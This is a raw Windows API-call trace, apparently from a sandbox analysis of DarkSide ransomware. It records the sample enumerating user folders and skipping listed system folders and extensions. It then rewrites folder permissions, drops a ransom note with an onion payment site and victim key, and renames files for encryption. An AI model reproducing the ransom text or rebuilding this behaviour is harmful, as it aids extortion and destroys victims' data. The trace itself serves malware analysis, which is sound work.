ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98174a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98174a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0168.110] _wcsicmp (_Str1="$recycle.bin", _Str2="Videos") returned -82 [0168.110] wcslen (_String="$recycle.bin") returned 0xc [0168.110] _wcsicmp (_Str1="config.msi", _Str2="Videos") returned -19 [0168.110] wcslen (_String="config.msi") returned 0xa [0168.110] _wcsicmp (_Str1="$windows.~bt", _Str2="Videos") returned -82 [0168.110] wcslen (_String="$windows.~bt") returned 0xc [0168.111] _wcsicmp (_Str1="$windows.~ws", _Str2="Videos") returned -82 [0168.111] wcslen (_String="$windows.~ws") returned 0xc [0168.111] _wcsicmp (_Str1="windows", _Str2="Videos") returned 1 [0168.111] wcslen (_String="windows") returned 0x7 [0168.111] _wcsicmp (_Str1="appdata", _Str2="Videos") returned -21 [0168.111] wcslen (_String="appdata") returned 0x7 [0168.111] _wcsicmp (_Str1="application data", _Str2="Videos") returned -21 [0168.111] wcslen (_String="application data") returned 0x10 [0168.111] _wcsicmp (_Str1="boot", _Str2="Videos") returned -20 [0168.111] wcslen (_String="boot") returned 0x4 [0168.111] _wcsicmp (_Str1="google", _Str2="Videos") returned -15 [0168.111] wcslen (_String="google") returned 0x6 [0168.111] _wcsicmp (_Str1="mozilla", _Str2="Videos") returned -9 [0168.111] wcslen (_String="mozilla") returned 0x7 [0168.111] _wcsicmp (_Str1="program files", _Str2="Videos") returned -6 [0168.111] wcslen (_String="program files") returned 0xd [0168.111] _wcsicmp (_Str1="program files (x86)", _Str2="Videos") returned -6 [0168.111] wcslen (_String="program files (x86)") returned 0x13 [0168.111] _wcsicmp (_Str1="programdata", _Str2="Videos") returned -6 [0168.111] wcslen (_String="programdata") returned 0xb [0168.111] _wcsicmp (_Str1="system volume information", _Str2="Videos") returned -3 [0168.111] wcslen (_String="system volume information") returned 0x19 [0168.111] _wcsicmp (_Str1="tor browser", _Str2="Videos") returned -2 [0168.111] wcslen (_String="tor browser") returned 0xb [0168.111] _wcsicmp (_Str1="windows.old", _Str2="Videos") returned 1 [0168.111] wcslen (_String="windows.old") returned 0xb [0168.112] _wcsicmp (_Str1="intel", _Str2="Videos") returned -13 [0168.112] wcslen (_String="intel") returned 0x5 [0168.112] _wcsicmp (_Str1="msocache", _Str2="Videos") returned -9 [0168.112] wcslen (_String="msocache") returned 0x8 [0168.112] _wcsicmp (_Str1="perflogs", _Str2="Videos") returned -6 [0168.112] wcslen (_String="perflogs") returned 0x8 [0168.112] _wcsicmp (_Str1="x64dbg", _Str2="Videos") returned 2 [0168.112] wcslen (_String="x64dbg") returned 0x6 [0168.112] _wcsicmp (_Str1="public", _Str2="Videos") returned -6 [0168.112] wcslen (_String="public") returned 0x6 [0168.112] _wcsicmp (_Str1="all users", _Str2="Videos") returned -21 [0168.112] wcslen (_String="all users") returned 0x9 [0168.112] _wcsicmp (_Str1="default", _Str2="Videos") returned -18 [0168.112] wcslen (_String="default") returned 0x7 [0168.112] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0168.112] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0168.112] wcscpy (in: _Dest=0x1d1044, _Source="Videos" | out: _Dest="Videos") returned="Videos" [0168.112] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x210e20 [0168.113] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0168.115] wcscpy (in: _Dest=0x210e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.115] GetNamedSecurityInfoW () returned 0x0 [0168.116] SetEntriesInAclW () returned 0x0 [0168.116] SetNamedSecurityInfoW () returned 0x0 [0168.137] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c568) returned 1 [0168.137] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0168.137] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 1 [0168.137] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0168.137] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0168.138] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0168.138] CloseHandle (hObject=0x1bc) returned 1 [0168.139] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0168.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.139] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="" [0168.139] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 0x29 [0168.139] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0168.139] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x91eac6a0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91eac6a0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.140] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.140] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0168.140] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0168.140] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0168.140] wcslen (_String="autorun.inf") returned 0xb [0168.140] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0168.140] wcslen (_String="boot.ini") returned 0x8 [0168.140] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0168.140] wcslen (_String="bootfont.bin") returned 0xc [0168.140] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0168.140] wcslen (_String="bootsect.bak") returned 0xc [0168.140] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0168.140] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9574860, ftCreationTime.dwHighDateTime=0x1d5daf4, ftLastAccessTime.dwLowDateTime=0x498111f0, ftLastAccessTime.dwHighDateTime=0x1d5ddf1, ftLastWriteTime.dwLowDateTime=0x498111f0, ftLastWriteTime.dwHighDateTime=0x1d5ddf1, nFileSizeHigh=0x0, nFileSizeLow=0xfea9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dg40hxxsY.mp4", cAlternateFileName="DG40HX~1.MP4")) returned 1 [0168.141] _wcsicmp (_Str1="Dg40hxxsY.mp4", _Str2="README.c06622a1.TXT") returned -14 [0168.141] wcsstr (_Str="Dg40hxxsY.mp4", _SubStr="README") returned 0x0 [0168.141] _wcsicmp (_Str1="autorun.inf", _Str2="Dg40hxxsY.mp4") returned -3 [0168.141] wcslen (_String="autorun.inf") returned 0xb [0168.141] _wcsicmp (_Str1="boot.ini", _Str2="Dg40hxxsY.mp4") returned -2 [0168.141] wcslen (_String="boot.ini") returned 0x8 [0168.141] _wcsicmp (_Str1="bootfont.bin", _Str2="Dg40hxxsY.mp4") returned -2 [0168.141] wcslen (_String="bootfont.bin") returned 0xc [0168.141] _wcsicmp (_Str1="bootsect.bak", _Str2="Dg40hxxsY.mp4") returned -2 [0168.141] wcslen (_String="bootsect.bak") returned 0xc [0168.141] _wcsicmp (_Str1="desktop.ini", _Str2="Dg40hxxsY.mp4") returned -2 [0168.141] wcslen (_String="desktop.ini") returned 0xb [0168.141] _wcsicmp (_Str1="iconcache.db", _Str2="Dg40hxxsY.mp4") returned 5 [0168.141] wcslen (_String="iconcache.db") returned 0xc [0168.141] _wcsicmp (_Str1="ntldr", _Str2="Dg40hxxsY.mp4") returned 10 [0168.141] wcslen (_String="ntldr") returned 0x5 [0168.141] _wcsicmp (_Str1="ntuser.dat", _Str2="Dg40hxxsY.mp4") returned 10 [0168.141] wcslen (_String="ntuser.dat") returned 0xa [0168.141] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Dg40hxxsY.mp4") returned 10 [0168.141] wcslen (_String="ntuser.dat.log") returned 0xe [0168.141] _wcsicmp (_Str1="ntuser.ini", _Str2="Dg40hxxsY.mp4") returned 10 [0168.141] wcslen (_String="ntuser.ini") returned 0xa [0168.141] _wcsicmp (_Str1="thumbs.db", _Str2="Dg40hxxsY.mp4") returned 16 [0168.141] wcslen (_String="thumbs.db") returned 0x9 [0168.141] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.141] wcslen (_String="386") returned 0x3 [0168.141] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.141] wcslen (_String="adv") returned 0x3 [0168.141] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.141] wcslen (_String="ani") returned 0x3 [0168.141] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.141] wcslen (_String="bat") returned 0x3 [0168.141] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.141] wcslen (_String="bin") returned 0x3 [0168.142] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.142] wcslen (_String="cab") returned 0x3 [0168.142] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.142] wcslen (_String="cmd") returned 0x3 [0168.142] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.142] wcslen (_String="com") returned 0x3 [0168.142] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.142] wcslen (_String="cpl") returned 0x3 [0168.142] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.142] wcslen (_String="cur") returned 0x3 [0168.142] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.142] wcslen (_String="deskthemepack") returned 0xd [0168.142] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.142] wcslen (_String="diagcab") returned 0x7 [0168.142] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.142] wcslen (_String="diagcfg") returned 0x7 [0168.142] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.142] wcslen (_String="diagpkg") returned 0x7 [0168.142] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.142] wcslen (_String="dll") returned 0x3 [0168.142] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.142] wcslen (_String="drv") returned 0x3 [0168.142] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.142] wcslen (_String="exe") returned 0x3 [0168.142] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.142] wcslen (_String="hlp") returned 0x3 [0168.142] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.142] wcslen (_String="icl") returned 0x3 [0168.142] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.142] wcslen (_String="icns") returned 0x4 [0168.142] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.142] wcslen (_String="ico") returned 0x3 [0168.142] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.142] wcslen (_String="ics") returned 0x3 [0168.143] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.143] wcslen (_String="idx") returned 0x3 [0168.143] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.143] wcslen (_String="ldf") returned 0x3 [0168.143] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.143] wcslen (_String="lnk") returned 0x3 [0168.143] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.143] wcslen (_String="mod") returned 0x3 [0168.143] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.143] wcslen (_String="mpa") returned 0x3 [0168.143] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.143] wcslen (_String="msc") returned 0x3 [0168.143] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.143] wcslen (_String="msp") returned 0x3 [0168.143] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.143] wcslen (_String="msstyles") returned 0x8 [0168.143] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.143] wcslen (_String="msu") returned 0x3 [0168.143] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.143] wcslen (_String="nls") returned 0x3 [0168.143] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.143] wcslen (_String="nomedia") returned 0x7 [0168.143] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.143] wcslen (_String="ocx") returned 0x3 [0168.143] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.143] wcslen (_String="prf") returned 0x3 [0168.143] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.143] wcslen (_String="ps1") returned 0x3 [0168.143] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.143] wcslen (_String="rom") returned 0x3 [0168.143] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.143] wcslen (_String="rtp") returned 0x3 [0168.143] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.143] wcslen (_String="scr") returned 0x3 [0168.143] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.144] wcslen (_String="shs") returned 0x3 [0168.144] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.144] wcslen (_String="spl") returned 0x3 [0168.144] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.144] wcslen (_String="sys") returned 0x3 [0168.144] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.144] wcslen (_String="theme") returned 0x5 [0168.144] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.144] wcslen (_String="themepack") returned 0x9 [0168.144] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.144] wcslen (_String="wpx") returned 0x3 [0168.144] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.144] wcslen (_String="lock") returned 0x4 [0168.144] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.144] wcslen (_String="key") returned 0x3 [0168.144] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.144] wcslen (_String="hta") returned 0x3 [0168.144] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.144] wcslen (_String="msi") returned 0x3 [0168.144] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.144] wcslen (_String="pdb") returned 0x3 [0168.144] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.144] wcslen (_String="sqlite") returned 0x6 [0168.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0168.144] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.150] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0168.150] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned 0x28 [0168.150] wcscpy (in: _Dest=0x321009a, _Source="Dg40hxxsY.mp4" | out: _Dest="Dg40hxxsY.mp4") returned="Dg40hxxsY.mp4" [0168.150] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4", dwFileAttributes=0x80) returned 1 [0168.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dg40hxxsy.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0168.151] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.151] ReadFile (in: hFile=0x1b8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0168.151] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x394b8973 [0168.151] RtlComputeCrc32 (PartialCrc=0x8973, Buffer=0x32ec24, Length=0x80) returned 0x41a8c09 [0168.152] RtlComputeCrc32 (PartialCrc=0x8c09, Buffer=0x32ec24, Length=0x80) returned 0x755675e [0168.152] RtlComputeCrc32 (PartialCrc=0x675e, Buffer=0x32ec24, Length=0x80) returned 0x823473e9 [0168.152] RtlComputeCrc32 (PartialCrc=0x73e9, Buffer=0x32ec24, Length=0x80) returned 0x57f2a46b [0168.152] CloseHandle (hObject=0x1b8) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.152] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4" [0168.152] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4") returned 0x36 [0168.152] wcscpy (in: _Dest=0x32200bc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.152] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dg40hxxsy.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dg40hxxsy.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Dg40hxxsY.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dg40hxxsy.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0168.155] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.155] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7c3fe8ec [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x44b99c41 [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2a1b421d [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74a67330 [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36da66fc [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x768cb533 [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2657a803 [0168.160] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x615543b4 [0168.163] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x96c7d84f [0168.164] RtlComputeCrc32 (PartialCrc=0xd84f, Buffer=0x710094, Length=0x80) returned 0xeb10c7e0 [0168.164] RtlComputeCrc32 (PartialCrc=0xc7e0, Buffer=0x710094, Length=0x80) returned 0xdbe6319f [0168.164] RtlComputeCrc32 (PartialCrc=0x319f, Buffer=0x710094, Length=0x80) returned 0xe47507ee [0168.164] RtlComputeCrc32 (PartialCrc=0x7ee, Buffer=0x710094, Length=0x80) returned 0x22961dd8 [0168.164] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0168.164] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0168.164] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0168.164] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x530b6bb0, ftCreationTime.dwHighDateTime=0x1d5e2d0, ftLastAccessTime.dwLowDateTime=0x7d3c77b0, ftLastAccessTime.dwHighDateTime=0x1d5e4c6, ftLastWriteTime.dwLowDateTime=0x7d3c77b0, ftLastWriteTime.dwHighDateTime=0x1d5e4c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hMUWsCiYUPz2VTz", cAlternateFileName="HMUWSC~1")) returned 1 [0168.164] _wcsicmp (_Str1="$recycle.bin", _Str2="hMUWsCiYUPz2VTz") returned -68 [0168.164] wcslen (_String="$recycle.bin") returned 0xc [0168.164] _wcsicmp (_Str1="config.msi", _Str2="hMUWsCiYUPz2VTz") returned -5 [0168.164] wcslen (_String="config.msi") returned 0xa [0168.164] _wcsicmp (_Str1="$windows.~bt", _Str2="hMUWsCiYUPz2VTz") returned -68 [0168.164] wcslen (_String="$windows.~bt") returned 0xc [0168.164] _wcsicmp (_Str1="$windows.~ws", _Str2="hMUWsCiYUPz2VTz") returned -68 [0168.164] wcslen (_String="$windows.~ws") returned 0xc [0168.164] _wcsicmp (_Str1="windows", _Str2="hMUWsCiYUPz2VTz") returned 15 [0168.164] wcslen (_String="windows") returned 0x7 [0168.164] _wcsicmp (_Str1="appdata", _Str2="hMUWsCiYUPz2VTz") returned -7 [0168.164] wcslen (_String="appdata") returned 0x7 [0168.164] _wcsicmp (_Str1="application data", _Str2="hMUWsCiYUPz2VTz") returned -7 [0168.164] wcslen (_String="application data") returned 0x10 [0168.164] _wcsicmp (_Str1="boot", _Str2="hMUWsCiYUPz2VTz") returned -6 [0168.164] wcslen (_String="boot") returned 0x4 [0168.164] _wcsicmp (_Str1="google", _Str2="hMUWsCiYUPz2VTz") returned -1 [0168.164] wcslen (_String="google") returned 0x6 [0168.164] _wcsicmp (_Str1="mozilla", _Str2="hMUWsCiYUPz2VTz") returned 5 [0168.164] wcslen (_String="mozilla") returned 0x7 [0168.164] _wcsicmp (_Str1="program files", _Str2="hMUWsCiYUPz2VTz") returned 8 [0168.164] wcslen (_String="program files") returned 